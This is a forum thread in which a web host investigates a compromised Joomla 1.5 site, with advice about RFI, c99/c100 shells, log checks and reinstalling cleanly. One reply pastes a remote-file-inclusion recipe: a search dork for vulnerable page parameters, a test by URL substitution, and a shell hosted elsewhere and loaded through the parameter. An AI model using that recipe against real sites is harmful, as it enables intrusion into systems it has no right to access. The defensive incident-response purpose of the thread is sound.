[solved] Finding the entry point of the hack

[rodajr]

Hello guys,

Straight to the subject:

We are the host and we have a hacked website. The webmaster said this :"our site is security level 5 and we know that is technically impossible to insert files in the server through the website". <- no comments about this

Due to this issue our server is going down a lot since last week when we discovered the hack, and we have mail spam going out of the server.

Searching the website foulder we found a few files with malicious code.

I need help to find out how the hacker placed those files in the server.
What kinda of the attack was ?
Was really a entry point through the website?

Anyway I need more information and I prefer advices / suggestions / ideas from this forum because I need prepare a proper answer to our client.

The website is Joomla 1.5 and already check with the jts-post_1.1.1 script, to see the 3rd party components / modules, there are not in the vulnerable extension list.


Can I paste here the php code that we found?
The files is CPhack.php.

I hope to wrote a clear explanation, if not , just say so and I will try my best in the next post.

[alikon]

we know that is technically impossible to insert files in the server through the website

have you heard about RFI ?
read this on wikipedia

[Webdongle]

• Delete ALL the folders and files on the server. That's ALL the folders and files.
  (you can leave the configuration.php if you physically inspect it).
• Check ALL the computers that have server access for malware etc. That's ALL the computers that have server access .
• Change your passwords.
• Use the files from the Joomla full package to upload to the server. All except the /installation folder.

http://forum.joomla.org/viewtopic.php?f=432&t=475313

[rodajr]

Yes sir, I did.

And that particular article made me post here.
I want to know exactly how the attack happened to prevent future problems and learn.
I'm studying the case, just need a few directions.

Just learned, seems to be 3 injection attacks but I looking for the entry.

I checked this so far:
http://docs.joomla.org/Security_Checkli ... rver_Setup
http://forum.joomla.org/viewtopic.php?f=432&t=590555
and others

and meanwhile our server administrator is running a few countermeasures.

[mandville]

Running and posting the jts results will help give a clue to what's going on.
Checklist 7 is also a good read.

[rodajr]

Thank you for the replies .

Webdongle, I checked the link you posted before but I want to know how this happened.

We are not going to wipe the joomla from our server yet, the webmaster is "trying" to clean his work. He is not from our company.

We trying to figure what is happenning to our server.
We think, the hacker got in the website, placed a files to do brute force and use our server to send spams.

I will paste the code here.

[rodajr]

Mandville, thank you.

Yes I did it too. I saw your posts around.
I cant use the script right now because the webmaster put the site in off .

Here what I have now.

[rodajr]

I can´t post the script info yet, meanwhile...


this file I posted is the CPhack.php we found in the root folder in the website.

[Webdongle]

....
I cant use the script right now because the webmaster put the site in off .
...

Which site ? The one that should have been deleted or the files from a fresh Joomla full package ?

[rodajr]

The hacked one.

Like I said, we are the host only. The webmaster think our server is the problem. And right now he is checking his joomla.

[Webdongle]

....
Like I said, we are the host only. The webmaster think our server is the problem. And right now he is checking his joomla.

Ok, am with it now.
The jts post assistant will run even if the site is set Offline. The question is do you have the right to run it on the server to (what can only be described as) spy on his setup ? If you tick the boxes it will tell you a lot of info. Including all the extensions used. That way you can see if he is using any extensions on the VEL

Screenshot-653.png

And a wealth of other information.

[rodajr]

isnt running. the websmaster working
this is the msg

jtablesession::Store Failed
DB function failed with error number 145
Table './our_bd/jos_session' is marked as crashed and should be repaired SQL=INSERT INTO `jos_session` ( `session_id`,`time`,`username`,`gid`,`guest`,`client_id` ) VALUES ( '84b058cd0196f4b1d2153b97ae52cf32','1312317081','','0','1','0' )


this is one of our problems, the webmaster , our client hired him.

PS: the "dude" doesn't know what happen and he is saying is a issue on our server. He tried to fix some joomla data base problem. oh boy!! this is going to be a hell of week (

The webmaster is trying to put the fault on us .

[Webdongle]

But it ran before ? I tested on a 1.5 local install with site Offline and it worked for me. So if it worked before then someone has messed with something on the site or in the database.

Addendum
Have you checked the access logs for ../../../../ type paths ?

[rodajr]

Yes, it ran.

I checked all their components on the extension list about vunerabilites.
We have to wait the dam guy fix what he is trying to do

it is complicated.

Well meanwhile, we changed the password of all emails from the client due to the warning of spam.
We put some brute protection on. So far, 6 hours without problems on the server.
Coincidence or not, the website was off line too.

[Webdongle]

Have you checked the access logs for ../../../../ type paths ?

[rodajr]

Ok guys. I will not update until tomorrow.

Thank you for all replies and attention. Talk to you in a bit.

cya

[rodajr]

hello guys,

I did it.

Joomla! Version: AIserver .0 Production/Stable [ Khepri ] Agosto-2008 23:55 GMT
configuration.php: Writable (Mode: 644 ) | Architecture/Platform: Linux 2.6.18-194.26.1.el5xen ( x86_64) | Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 ( http://******) | PHP Version: 5.2.9
PHP Requirements: register_globals: Disabled | magic_quotes_gpc: Enabled | safe_mode: Disabled | MySQL Support: Yes | XML Support: Yes | zlib Support: Yes
mbstring Support (1.5 or above): No | iconv Support (1.5 or above): Yes | save.session_path: Writable | Max.Execution Time: 30 seconds | File Uploads: Enabled
MySQL Version: 5.0.92-community ( Localhost via UNIX socket )

SEF: Disabled | Legacy Mode: N/A | FTP Layer: N/A | htaccess: Implemented
PHP/suExec: User and Web Server accounts are the same. (PHP/suExec probably installed)
PHP Environment: API: cgi | MySQLi: No | Max. Memory: 32M | Max. Upload Size: 2M | Max. Post Size: 8M | Max. Input Time: 60 | Zend Version: 2.2.0
Disabled Functions:
MySQL Client: 5.0.92 ( latin1 )

So, our server was up for about 12 hours then the webmaster put his joomla on and our server went down again

[mandville]

I do not recognise that version of joomla. Nothing we current support is that old.
I would be tempted to surrende your client again unless they used a current secure version.

[Webdongle]

http://docs.joomla.org/Khepri_Template_CSS
Oct 2008

http://www.projectamplify.com/joomla-15 ... plate.html

Since this is a core file it's best to copy this file to the root of the default front end template and then make edits. This will override the file at templates/system/offline.php

http://joomlawebhosting.ca/index.php?op ... whitelabel
Looks like it is an Administrator Template that some people install outside of the /administrator Sounds like a possible way for a site to be hacked from ?

[rodajr]

We did a test with the file we found, CPhack.php.

This is a method to get the cpanel login and so on.
Just open a page in the website showing informations and not saving in a file inside the server. The file has an encrypted part with this informations:



Ok. Fact: Someone found a entry in the website, did a php injection, put the file into the server (website folder), got information and started to use our server as a spam sender.

Questions remains:

- still, what entry point?
- why our server goes down because of it? (when the website was offline, and I say about his data base, the server stood up, running normal and not sending spam out )


We are cheking logs and monitoring.

[Webdongle]

What extensions were installed ?

are there any ../../../ type url's in the logs ?

[rodajr]

I will do a list of what they have on it

************


Administrator Components
 Component Name  Version  Author  Author Site  Type

 Polls  v1.5.0  Joomla! Project  www.joomla.org  Core
 This component manages polls...

 Banners  v1.5.0  Joomla! Project  www.joomla.org  Core
 This component manages banners and banner clients...

 HsConfig  v1.0.3  Ken Lowther  www.joomlanook.com  3rd Party


 ccNewsletter  v1.0.4 Stable  AI  www.aiserver.com.br  3rd Party
 Sistema de newsletter...

 Contact Items  v1.0.0  Joomla! Project  www.joomla.org  Core
 Parameters for individual Contact Items...

 Contact  v1.5.0  Joomla! Project  www.joomla.org  Core
 This component shows a listing of Contact Information...

 Trash  v1.0.0  Joomla! Project  www.joomla.org  Core
 PARAMTRASH...

 Frontpage  v1.5.0  Joomla! Project  www.joomla.org  Core
 This Component shows all the published Articles from your site marked Show on Front Page....

 Configuration Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Configuration Manager...

 JCE  v1.5.7  Ryan Demmer  www.joomlacontenteditor.net  3rd Party
 JCE ADMIN DESC...

 Media Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 This component manages site media...

 Zoo  v1.0.4  YOOtheme  www.yootheme.com  3rd Party
 Zoo Joomla 1.5 component from YOOtheme.com (http://www.yootheme.com)...

 Cache Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Cache Manager...

 Language Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Language Manager...

 User Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 User Manager...

 Plugin Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Plugin Manager...

 Module Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Module Manager...

 Installation Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Installation Manager...

 Menus Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Menu Manager...

 Search  v1.5.0  Joomla! Project  www.joomla.org  Core
 DESCSEARCH...

 Messaging  v1.5.0  Joomla! Project  www.joomla.org  Core
 Messaging...

 Template Manager  v1.5.0  Joomla! Project  www.joomla.org  Core
 Template Manager...

 Control Panel  v1.5.0  Joomla! Project  www.joomla.org  Core
 The Control Panel is the Home Page of the Joomla! Administrator Back-end...

 Mass Mail  v1.5.0  Joomla! Project  www.joomla.org  Core
 DESCMASSMAIL...

 Content Page  v1.5.0  Joomla! Project  www.joomla.org  Core
 DESCCONTENT...

Done Processing Administrator Components


Site Components
 Component Name  Version  Author  Author Site  Type

 Wrapper  v1.5.0  Joomla! Project  www.joomla.org  Core
 Wrapper...

 MailTo  v1.5.0  Joomla! Project  www.joomla.org  Core
 A generic mail to friend component...

 User  v1.5.0  Joomla! Project  www.joomla.org  Core
 User Self-Management...

Done Processing Site Components

Administrator Modules
 Module Name  Version  Author  Author Site  Type

Done Processing Administrator Modules


Site Modules
 Modules Name  Version  Author  Author Site  Type

Done Processing Site Modules

Site Plugins
 Plugin Name  Version  Author  Author Site  Type

 Editor - XStandard Lite for Joomla!  v1.0  Joomla! Project  www.joomla.org  Core
 DESCXSTANDARD

 Editor - JCE 1.5.6  v1.5.6  Ryan Demmer  www.joomlacontenteditor.net  3rd Party
 JCE EDITOR DESC

 Editor - None  v1.0  3rd Party
 This loads a basic text entry field

 Editor - TinyMCE 3  v3.2.6  Moxiecode Systems AB  tinymce.moxiecode.com/  3rd Party
 DESCTINYMCE

 Content - Load Modules  v1.5  Joomla! Project  www.joomla.org  Core
 DESCLOADPOSITION

 Content - Highslide  v2.0.0  Ken Lowther  www.joomlanook.com  3rd Party
 HIGHSLIDE

 Content - Vote  v1.5  Joomla! Project  www.joomla.org  Core
 Add the Voting functionality to Items

 Content - Code Highlighter (GeSHi)  v1.5  Joomla! Project  qbnz.com/highlighter  Core
 DESCGESHI

 Content - Example  v1.0  Joomla! Project  www.joomla.org  Core
 An example content plugin

 Content - Email Cloaking  v1.5  Joomla! Project  www.joomla.org  Core
 DESCMOSEMAILCLOAK

 Content - Pagebreak  v1.5  Joomla! Project  www.joomla.org  Core
 DESCCONTENTPAGEBREAK

 Content - KA Facebook Comments  v1.5.x.2.3  Khawaib Ahmed  www.Khawaib.co.uk  3rd Party
 KAFACEBOOKCOMMENTSPLG_INSTALLATION

 Content - Page Navigation  v1.5  Joomla! Project  www.joomla.org  Core
 DESCPAGENAVIGATION

 System - Modal Popup Content  v1.0  DoJoomla  www.dojoomla.com  3rd Party
 Modal Popup Content

 System - Log  v1.5  Joomla! Project  www.joomla.org  Core
 Provides system logging

 AIeffects  v1.5.0  FNC  www.aiserver.com.br  3rd Party
 AIeffects plugin

 System - Remember Me  v1.5  Joomla! Project  www.joomla.org  Core
 Provides remember me functionality

 System - Legacy  v1.5  Joomla! Project  www.joomla.org  Core
 Provides legacy support for older version of Joomla!

 System - Cache  v1.5  Joomla! Project  www.joomla.org  Core
 Provides page caching

 System - Backlinks  v1.5  Joomla! Project  www.joomla.org  Core
 Provides backlink support

 System - SEF  v1.5  Joomla! Project  www.joomla.org  Core
 DESCPLGSYSTEMSEF

 System - JavaScript SDK  v1.5.x.3.3.1  Khawaib Ahmed  www.Khawaib.co.uk  3rd Party
 JASCRIPTSDK_INSTALLATION

 System - Debug  v1.5  Joomla! Project  www.joomla.org  Core
 Provides debug information

 User - Example  v1.0  Joomla! Project  www.joomla.org  Core
 An example user synchronisation plugin

 User - Joomla!  v1.5  Joomla! Project  www.joomla.org  Core
 PLG_USER_JOOMLA

 Search - Sections  v1.5  Joomla! Project  www.joomla.org  Core
 Allows Searching of Content Section information

 Search - Weblinks  v1.5  Joomla! Project  www.joomla.org  Core
 Allows Searching of Weblinks Component

 Search - Contacts  v1.5  Joomla! Project  www.joomla.org  Core
 Allows Searching of Contacts Component

 Search - Newsfeeds  v1.5  Joomla! Project  www.joomla.org  Core
 Allows Searching of Newsfeeds

 Search - Content  v1.5  Joomla! Project  www.joomla.org  Core
 ALLOWS SEARCHING OF ALL ARTICLES

 Search - Zoo  v1.0.2  YOOtheme  www.yootheme.com  3rd Party
 Zoo Search Joomla 1.5 plugin from YOOtheme.com (http://www.yootheme.com)

 Search - Categories  v1.5  Joomla! Project  www.joomla.org  Core
 Allows Searching of Categories information

 XML-RPC - Blogger API  v1.0  Joomla! Project  www.joomla.org  Core
 Blogger XML-RPC API

 XML-RPC - Joomla API  v1.0  Joomla! Project  www.joomla.org  Core
 Joomla! XML-RPC API

 Button - Image  v1.0.0  Joomla! Project  www.joomla.org  Core
 DESCIMAGE

 Button - Readmore  v1.5  Joomla! Project  www.joomla.org  Core
 DESCREADMORE

 Button - Pagebreak  v1.5  Joomla! Project  www.joomla.org  Core
 DESCPAGEBREAK

 Authentication - Example  v1.5  Joomla! Project  www.joomla.org  Core
 An example of an authentication plugin

 Authentication - LDAP  v1.5  Joomla! Project  www.joomla.org  Core
 Handles user authentication against an LDAP server

 Authentication - Joomla  v1.5  Joomla! Project  www.joomla.org  Core
 Handles Joomlas default user authentication

 Authentication - GMail  v1.5  Joomla! Project  www.joomla.org  Core
 Handles user authentication with a GMail account

 Authentication - OpenID  v1.5  Joomla! Project  www.joomla.org  Core
 Handles user authentication with an OpenID (Requires PHP5)

[Webdongle]

None of those appear to be up to date versions.

What about your access logs ? any ../../../../ type entries ?

[rodajr]

guys,

I'm already looking for but do you have something about shell c99?
We decrypted a code and that was a known name.
I know this is a tool for RFI. I need more safe material to study.

[Webdongle]

use google to find site vulnerability: inurl:index.php?page=
Try the site is vulnerability just delete and replace http://www.google.com
example: http://www.vulnerabilitysite.com/index.php?page=HERE REPLACE!http://www.google.com then press enter if you get site like a google then site is vulnerability!Upload shell on http://www.110mb.com and replace url: http://www.google.com and that's it!

http://www.hackcommunity.com/Thread-How ... -shell-c99

http://www.exploit-db.com/exploits/17603/

http://www.[youtube].com/watch?v=ylDzxXez ... re=related
Drag the bar about 2/3 along and watch how it's put in. Then you will see why I ask about access logs with ../../../../ in the url

http://www.[youtube].com/watch?v=o4NtQvgv ... re=related

[rodajr]

Webdongle,

Thank you dude! Really appreciate all your replies.
I couldnt check logs, my co worker is on the server duty.
I was researching and studying the code.

Now I understand what you were asking me. I'll ask for all the logs we can get.

Question 1, can I find logs in joomla too? I'm not expert in Joomla, have been studying about 2 months. Just started to learn the code in it.
I checked the basic folders.

Question 2 (I still reading and watching the material you linked) The hacked website was using SEF, even with this can be use the injection on the url?

[Webdongle]

To the best of my understanding
SEF url's are are 'symbolic' links that are routed to the normal links.

eg
If you have SEF from a menu item of
www.yoursite.com/search-site.html
then
http://www.yoursite.com/index.php?optio ... iew=search
will still reach the search page


http://www.yoursite.com/index.php?optio ... iew=search is a great way to search a 1.5 even when there is no menu item. So if you don't put a search button on a site because you don't want Search. Then go to Extensions >>> install/uninstall ... Components ... The just 'toggle' the green tick next to the Search module.

[rodajr]

Just to update this thread.

We did a few security measures on our server and we deleted the website, whole thing, to make sure we have found some malicious files in the server.
Now we upload the website, with the hack scritps and start to monitoring the entries. Hope to find the weak before we ask to the webmaster upload a really clean version.

btw, we found some files that lead us to c100 shell.

[PhilD]

c99, c57, c100, and other variants are all server root kit shells.

They enable the hacker in most cases to browse the entire server without any passwords required as if it were a hard drive on his computer. This means the hacker can do whatever he wants to anything on the server, as well as anything to any domain, or any software (Joomla, wordpress etc.) installed on any domain. This includes installing backdoors to the server, installing additional malware/root kits etc.

By having or leaving the c100 or any variants on the domain you are never going to fix the hack and you are risking further infection of the server, if the server has not already been rooted.

Log files are mostly useless if the person knows how to use the shell as the times and entries can be altered.

I would suggest you wipe your site and start over following checklist 7 and inform your host of the found shell script(s).

[rodajr]

Hi Phil,

Thanks for the info, you said a few things I wasnt aware, still studing what happing. Btw, this forum, this thread and the people who replied help me a lot.
But we are the host, this is the first time we face this. We are trying to learn to prevent in the future.
In my case, I really want to know the entry point in the joomla.

We found a lot of "alien" files in the server and my co worker deleted and tried to fix all the doors he found.

A question to you. If we clean what we have in the server now and we put the website with the alien script on it what could happen? Fail tentatives to get in again? or a door open?
Or to start the whole thing again the hacker has to do the injection attack again and so on?